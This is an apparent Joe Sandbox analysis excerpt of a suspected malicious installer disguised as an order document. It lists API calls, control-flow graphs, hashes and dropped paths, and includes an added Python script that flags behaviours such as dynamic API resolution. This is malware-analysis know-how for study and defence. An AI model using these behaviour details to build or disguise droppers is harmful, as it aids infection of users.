• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: Stedtillgs Setup: Completed
                                                        • API String ID: 4154960007-796908714
                                                        • Opcode ID: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                        • Instruction ID: 1ce46468062b4959d591950d49ef568145fe019f8889c876f185e2652ae6ab29
                                                        • Opcode Fuzzy Hash: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                        • Instruction Fuzzy Hash: AFA17A71900209BFDB219FA0DD89AAE7F79FB04345F10407AFA05B62A0C7B55E41DF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 409 405d00-405d0b 410 405d0d-405d1c 409->410 411 405d1e-405d33 409->411 410->411 412 405f26-405f2a 411->412 413 405d39-405d44 411->413 414 405f30-405f3a 412->414 415 405d56-405d60 412->415 413->412 416 405d4a-405d51 413->416 417 405f45-405f46 414->417 418 405f3c-405f40 call 405cde 414->418 415->414 419 405d66-405d6d 415->419 416->412 418->417 421 405d73-405da8 419->421 422 405f19 419->422 423 405ec3-405ec6 421->423 424 405dae-405db9 GetVersion 421->424 425 405f23-405f25 422->425 426 405f1b-405f21 422->426 427 405ef6-405ef9 423->427 428 405ec8-405ecb 423->428 429 405dd3 424->429 430 405dbb-405dbf 424->430 425->412 426->412 434 405f07-405f17 lstrlenA 427->434 435 405efb-405f02 call 405d00 427->435 431 405edb-405ee7 call 405cde 428->431 432 405ecd-405ed9 call 405c3c 428->432 433 405dda-405de1 429->433 430->429 436 405dc1-405dc5 430->436 447 405eec-405ef2 431->447 432->447 439 405de3-405de5 433->439 440 405de6-405de8 433->440 434->412 435->434 436->429 437 405dc7-405dcb 436->437 437->429 443 405dcd-405dd1 437->443 439->440 445 405e21-405e24 440->445 446 405dea-405e0d call 405bc5 440->446 443->433 450 405e34-405e37 445->450 451 405e26-405e32 GetSystemDirectoryA 445->451 457 405e13-405e1c call 405d00 446->457 458 405eaa-405eae 446->458 447->434 449 405ef4 447->449 453 405ebb-405ec1 call 405f49 449->453 455 405ea1-405ea3 450->455 456 405e39-405e47 GetWindowsDirectoryA 450->456 454 405ea5-405ea8 451->454 453->434 454->453 454->458 455->454 459 405e49-405e53 455->459 456->455 457->454 458->453 464 405eb0-405eb6 lstrcatA 458->464 461 405e55-405e58 459->461 462 405e6d-405e83 SHGetSpecialFolderLocation 459->462 461->462 466 405e5a-405e61 461->466 467 405e85-405e9c SHGetPathFromIDListA CoTaskMemFree 462->467 468 405e9e 462->468 464->453 470 405e69-405e6b 466->470 467->454 467->468 468->455 470->454 470->462
                                                        APIs
                                                        • GetVersion.KERNEL32(?,Completed,00000000,00405001,Completed,00000000), ref: 00405DB1
                                                        • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E2C
                                                        • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E3F
                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7B
                                                        • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 00405E89
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00405E94
                                                        • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB6
                                                        • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405001,Completed,00000000), ref: 00405F08
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: .>e$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 900638850-1708131723
                                                        • Opcode ID: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                        • Instruction ID: 5b78479c63d7672d4d5e7177f0c07aa329b3d72ca06d4f46a7854d902b85ef7c
                                                        • Opcode Fuzzy Hash: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                        • Instruction Fuzzy Hash: B661F171A04A01ABEF205F24DC88BAF3B68EB15314F10813BE941B62D0D33D5A42DF9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

control_flow_graph 716 4062b8-4062bd 717 40632e-40634c 716->717 718 4062bf-4062ee 716->718 719 406924-406939 717->719 720 4062f0-4062f3 718->720 721 4062f5-4062f9 718->721 722 406953-406969 719->722 723 40693b-406951 719->723 724 406305-406308 720->724 725 406301 721->725 726 4062fb-4062ff 721->726 729 40696c-406973 722->729 723->729 727 406326-406329 724->727 728 40630a-406313 724->728 725->724 726->724 732 4064fb-406519 727->732 730 406315 728->730 731 406318-406324 728->731 733 406975-406979 729->733 734 40699a-4069a6 729->734 730->731 735 40638e-4063bc 731->735 739 406531-406543 732->739 740 40651b-40652f 732->740 736 406b28-406b32 733->736 737 40697f-406997 733->737 744 40613c-406145 734->744 742 4063d8-4063f2 735->742 743 4063be-4063d6 735->743 745 406b3e-406b51 736->745 737->734 741 406546-406550 739->741 740->741 747 406552 741->747 748 4064f3-4064f9 741->748 749 4063f5-4063ff 742->749 743->749 750 406b53 744->750 751 40614b 744->751 746 406b56-406b5a 745->746 752 406663-406670 747->752 753 4064ce-4064d2 747->753 748->732 754 406497-4064a1 748->754 759 406405 749->759 760 406376-40637c 749->760 750->746 755 406152-406156 751->755 756 406292-4062b3 751->756 757 4061f7-4061fb 751->757 758 406267-40626b 751->758 752->744 770 4066bf-4066ce 752->770 771 4064d8-4064f0 753->771 772 406ada-406ae4 753->772 766 406ae6-406af0 754->766 767 4064a7-4064c9 754->767 755->745 773 40615c-406169 755->773 756->719 764 406201-40621a 757->764 765 406aa7-406ab1 757->765 762 406271-406285 758->762 763 406ab6-406ac0 758->763 779 406ac2-406acc 759->779 780 40635b-406373 759->780 768 406382-406388 760->768 769 40642f-406435 760->769 778 406288-406290 762->778 763->745 777 40621d-406221 764->777 765->745 766->745 767->752 768->735 775 406493 768->775 769->775 776 406437-406455 769->776 770->719 771->748 772->745 773->750 774 40616f-4061b5 773->774 781 4061b7-4061bb 774->781 782 4061dd-4061df 774->782 775->754 783 406457-40646b 776->783 784 40646d-40647f 776->784 777->757 785 406223-406229 777->785 778->756 778->758 779->745 780->760 786 4061c6-4061d4 GlobalAlloc 781->786 787 4061bd-4061c0 GlobalFree 781->787 789 4061e1-4061eb 782->789 790 4061ed-4061f5 782->790 788 406482-40648c 783->788 784->788 791 406253-406265 785->791 792 40622b-406232 785->792 786->750 793 4061da 786->793 787->786 788->769 794 40648e 788->794 789->789 789->790 790->777 791->778 795 406234-406237 GlobalFree 792->795 796 40623d-40624d GlobalAlloc 792->796 793->782 798 406414-40642c 794->798 799 406ace-406ad8 794->799 795->796 796->750 796->791 798->769 799->745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                        • Instruction ID: 6e58a974b7539627981ffc7c5b29088a4c4f0515112d774f0dd61bb038518bac
                                                        • Opcode Fuzzy Hash: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                        • Instruction Fuzzy Hash: 8DF17770D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D7785A96CF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                        • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                        • String ID:
                                                        • API String ID: 310444273-0
                                                        • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                        • Instruction ID: 3e3a2605e63591ce59f726a843aae7ace037ed194313f5fe4a7956cb36b79068
                                                        • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                        • Instruction Fuzzy Hash: 4AE0CD3290412167C3109B749D44E3773ACAFD4751305483DF506F2150D734AC11E7AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
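The API listings above (the list-view/clipboard routine starting at 405107, the shell-folder routine starting at 405d00, and the GetModuleHandleA / LoadLibraryA / GetProcAddress resolver whose call sites are 0040601B through 00406037) are what an analyst actually triages in a report like this. The following Python is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's "• Api.MODULE(args), ref: ADDR" format, one function's "APIs" block at a time, and flags API combinations per function. The behaviour sets it checks (dynamic API resolution, clipboard write/read, thread creation, shell-folder lookup) are this example's own triage heuristics, not the sandbox's signature logic; the sample sections are constructed from API lines printed on this page, and the section labels are chosen here rather than taken from the report.

```python
"""Parse Joe Sandbox-style API listings and flag API combinations per function.

Added example: not part of the sandbox report or of the analysed sample.
"""
import re
from typing import Dict, FrozenSet, List, NamedTuple, Tuple


class ApiCall(NamedTuple):
    name: str              # API name, e.g. "GetProcAddress"
    module: str            # module as printed, e.g. "KERNEL32"
    args: Tuple[str, ...]  # argument column split on commas ("?" = unknown)
    ref: int               # call-site address


# Matches "• Api.MODULE(args), ref: ADDR" and "• Api.MODULE ref: ADDR".
# "• Part of subcall function ...: Api.MODULE(...)" lines do not match on
# purpose: they belong to a callee, not to the function being listed.
_API_LINE = re.compile(
    r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the calls listed in one 'APIs' section, in listing order."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = _API_LINE.match(raw.strip())
        if not m:
            continue
        name, module, args, ref = m.groups()
        arg_tuple = tuple(args.split(",")) if args else ()
        calls.append(ApiCall(name, module, arg_tuple, int(ref, 16)))
    return calls


# Heuristic API sets used for triage in this example (an assumption of the
# example, not the sandbox's own signature logic). Every API in a set must
# occur within the same function for the behaviour to be flagged.
BEHAVIOURS: Dict[str, FrozenSet[str]] = {
    "dynamic API resolution": frozenset({"LoadLibraryA", "GetProcAddress"}),
    "clipboard write": frozenset({"OpenClipboard", "SetClipboardData"}),
    "clipboard read": frozenset({"OpenClipboard", "GetClipboardData"}),
    "thread creation": frozenset({"CreateThread"}),
    "shell folder lookup": frozenset(
        {"SHGetSpecialFolderLocation", "SHGetPathFromIDListA"}),
}


def flag_behaviours(calls: List[ApiCall]) -> Dict[str, List[int]]:
    """Map each flagged behaviour to the sorted call-site addresses behind it."""
    present = {c.name for c in calls}
    flagged: Dict[str, List[int]] = {}
    for label, needed in BEHAVIOURS.items():
        if needed <= present:
            flagged[label] = sorted(c.ref for c in calls if c.name in needed)
    return flagged


def triage_report(sections: Dict[str, str]) -> Dict[str, Dict[str, List[int]]]:
    """sections: function label -> text of that function's 'APIs' block."""
    return {label: flag_behaviours(parse_api_lines(text))
            for label, text in sections.items()}


# Sample input constructed from API lines printed on this page. The keys are
# labels chosen for this example; the report identifies functions by address.
SAMPLE_SECTIONS: Dict[str, str] = {
    "clipboard_fn_405107": r"""
• GetDlgItem.USER32(?,00000403), ref: 00405167
• SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DC
  • Part of subcall function 00404001: SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
• CreateThread.KERNELBASE(00000000,00000000,Function_0000509B,00000000), ref: 004052D7
• OpenClipboard.USER32(00000000), ref: 0040542D
• EmptyClipboard.USER32 ref: 00405433
• GlobalAlloc.KERNEL32(00000042,?), ref: 0040543C
• SetClipboardData.USER32(00000001,00000000), ref: 0040547E
• CloseClipboard.USER32 ref: 00405484
""",
    "shellfolder_fn_405d00": r"""
• SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7B
• SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 00405E89
• CoTaskMemFree.OLE32(00000000), ref: 00405E94
• lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB6
""",
    "resolver_fn_at_40601b": r"""
• GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
• LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
• GetProcAddress.KERNEL32(00000000,?), ref: 00406037
""",
}


if __name__ == "__main__":
    for func, flags in triage_report(SAMPLE_SECTIONS).items():
        for behaviour, refs in flags.items():
            print(f"{func}: {behaviour} at {', '.join(f'{r:#x}' for r in refs)}")
```

Flagging per function rather than over the whole listing is deliberate: GetProcAddress in one routine and LoadLibraryA in an unrelated one says little, whereas both inside the same small function (as in the resolver at 0040601B..00406037) is the classic dynamic-import pattern the report's "Contains functionality to dynamically determine API calls" signature refers to. The "Part of subcall function" lines are skipped for the same reason, since they describe a callee's behaviour rather than the listed function's own.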

                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(?,00421530,004210E8,0040589F,004210E8,004210E8,00000000,004210E8,004210E8,?,?,76232EE0,004055BE,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405FED
                                                        • FindClose.KERNEL32(00000000), ref: 00405FF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                        • Instruction ID: 3600370175755c1184b2d23a4f6bb82519631065e8d036e0b8342efe42824015
                                                        • Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                        • Instruction Fuzzy Hash: EBD0123295D1306BD3115778BD0C84BBA589F55334B528A73B466F22F0D7349C6286EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

control_flow_graph 164 403af9-403b0b 165 403b11-403b17 164->165 166 403c4c-403c5b 164->166 165->166 167 403b1d-403b26 165->167 168 403caa-403cbf 166->168 169 403c5d-403ca5 GetDlgItem * 2 call 403fcc SetClassLongA call 40140b 166->169 170 403b28-403b35 SetWindowPos 167->170 171 403b3b-403b3e 167->171 173 403cc1-403cc4 168->173 174 403cff-403d04 call 404018 168->174 169->168 170->171 175 403b40-403b52 ShowWindow 171->175 176 403b58-403b5e 171->176 178 403cc6-403cd1 call 401389 173->178 179 403cf7-403cf9 173->179 181 403d09-403d24 174->181 175->176 182 403b60-403b75 DestroyWindow 176->182 183 403b7a-403b7d 176->183 178->179 201 403cd3-403cf2 SendMessageA 178->201 179->174 186 403f99 179->186 187 403d26-403d28 call 40140b 181->187 188 403d2d-403d33 181->188 190 403f76-403f7c 182->190 192 403b90-403b96 183->192 193 403b7f-403b8b SetWindowLongA 183->193 189 403f9b-403fa2 186->189 187->188 197 403f57-403f70 DestroyWindow EndDialog 188->197 198 403d39-403d44 188->198 190->186 195 403f7e-403f84 190->195 199 403c39-403c47 call 404033 192->199 200 403b9c-403bad GetDlgItem 192->200 193->189 195->186 202 403f86-403f8f ShowWindow 195->202 197->190 198->197 203 403d4a-403d97 call 405d00 call 403fcc * 3 GetDlgItem 198->203 199->189 204 403bcc-403bcf 200->204 205 403baf-403bc6 SendMessageA IsWindowEnabled 200->205 201->189 202->186 234 403da1-403ddd ShowWindow KiUserCallbackDispatcher call 403fee EnableWindow 203->234 235 403d99-403d9e 203->235 209 403bd1-403bd2 204->209 210 403bd4-403bd7 204->210 205->186 205->204 212 403c02-403c07 call 403fa5 209->212 213 403be5-403bea 210->213 214 403bd9-403bdf 210->214 212->199 215 403c20-403c33 SendMessageA 213->215 216 403bec-403bf2 213->216 214->215 219 403be1-403be3 214->219 215->199 220 403bf4-403bfa call 40140b 216->220 221 403c09-403c12 call 40140b 216->221 219->212 230 403c00 220->230 221->199 231 403c14-403c1e 221->231 230->212 231->230 238 403de2 234->238 239 403ddf-403de0 234->239 235->234 240 403de4-403e12 GetSystemMenu EnableMenuItem SendMessageA 238->240 239->240 241 403e14-403e25 SendMessageA 240->241 242 403e27 240->242 243 403e2d-403e66 call 404001 call 405cde lstrlenA call 405d00 SetWindowTextA call 401389 241->243 242->243 243->181 252 403e6c-403e6e 243->252 252->181 253 403e74-403e78 252->253 254 403e97-403eab DestroyWindow 253->254 255 403e7a-403e80 253->255 254->190 257 403eb1-403ede CreateDialogParamA 254->257 255->186 256 403e86-403e8c 255->256 256->181 258 403e92 256->258 257->190 259 403ee4-403f3b call 403fcc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 257->259 258->186 259->186 264 403f3d-403f50 ShowWindow call 404018 259->264 266 403f55 264->266 266->190
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B35
                                                        • ShowWindow.USER32(?), ref: 00403B52
                                                        • DestroyWindow.USER32 ref: 00403B66
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B82
                                                        • GetDlgItem.USER32(?,?), ref: 00403BA3
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB7
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403BBE
                                                        • GetDlgItem.USER32(?,00000001), ref: 00403C6C
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403C76
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403C90
                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CE1
                                                        • GetDlgItem.USER32(?,00000003), ref: 00403D87
                                                        • ShowWindow.USER32(00000000,?), ref: 00403DA8
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DBA
                                                        • EnableWindow.USER32(?,?), ref: 00403DD5
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DEB
                                                        • EnableMenuItem.USER32(00000000), ref: 00403DF2
                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E0A
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1D
                                                        • lstrlenA.KERNEL32(Stedtillgs Setup: Completed,?,Stedtillgs Setup: Completed,Stedtillgs Setup), ref: 00403E46
                                                        • SetWindowTextA.USER32(?,Stedtillgs Setup: Completed), ref: 00403E55
                                                        • ShowWindow.USER32(?,0000000A), ref: 00403F89
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: Stedtillgs Setup$Stedtillgs Setup: Completed
                                                        • API String ID: 3282139019-1160849601
                                                        • Opcode ID: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                        • Instruction ID: d55a176a90e8b499f18b63baceb11f369ce23e9a5aae2cf9a731fb05d42b674d
                                                        • Opcode Fuzzy Hash: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                        • Instruction Fuzzy Hash: 20C1C271A04205BBDB206F61ED49E2B3E7CFB4470AF41443EF601B12E1C779A942AB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (function at 00403767; rendered graph with executed / not-executed block colouring not reproduced)
                                                        APIs
                                                          • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                          • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                          • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        • lstrcatA.KERNEL32(1033,Stedtillgs Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stedtillgs Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233410,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000), ref: 004037E2
                                                        • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168,1033,Stedtillgs Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Stedtillgs Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403857
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040386A
                                                        • GetFileAttributesA.KERNEL32(: Completed), ref: 00403875
                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168), ref: 004038BE
                                                          • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                        • RegisterClassA.USER32(00422E80), ref: 004038FB
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403913
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403948
                                                        • ShowWindow.USER32(00000005,00000000), ref: 0040397E
                                                        • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040398F
                                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399A
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 004039AA
                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 004039B7
                                                        • RegisterClassA.USER32(00422E80), ref: 004039C0
                                                        • DialogBoxParamA.USER32(?,00000000,00403AF9,00000000), ref: 004039DF
                                                        Similarity
                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Stedtillgs Setup: Completed$_Nb
                                                        • API String ID: 914957316-794890973
                                                        • Opcode ID: adef497c8dc9a51a072c8d1473dc94786368c7830bc24f3a940699fd44d0c710
                                                        • Instruction ID: f2042b1b728b60748b23566834e767a2e9ab566c559d5d3ffbf72b6bfa23c0d9
                                                        • Opcode Fuzzy Hash: adef497c8dc9a51a072c8d1473dc94786368c7830bc24f3a940699fd44d0c710
                                                        • Instruction Fuzzy Hash: 4861E4716442007EE320AF659D45F2B3EACEB4474AF40457FF940B22E2D7BD6D029A2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (function at 00402C79; rendered graph with executed / not-executed block colouring not reproduced)
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402C8D
                                                        • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,00000400), ref: 00402CA9
                                                          • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00405973
                                                          • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                        • GetFileSize.KERNEL32(00000000,00000000,Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 00402CF2
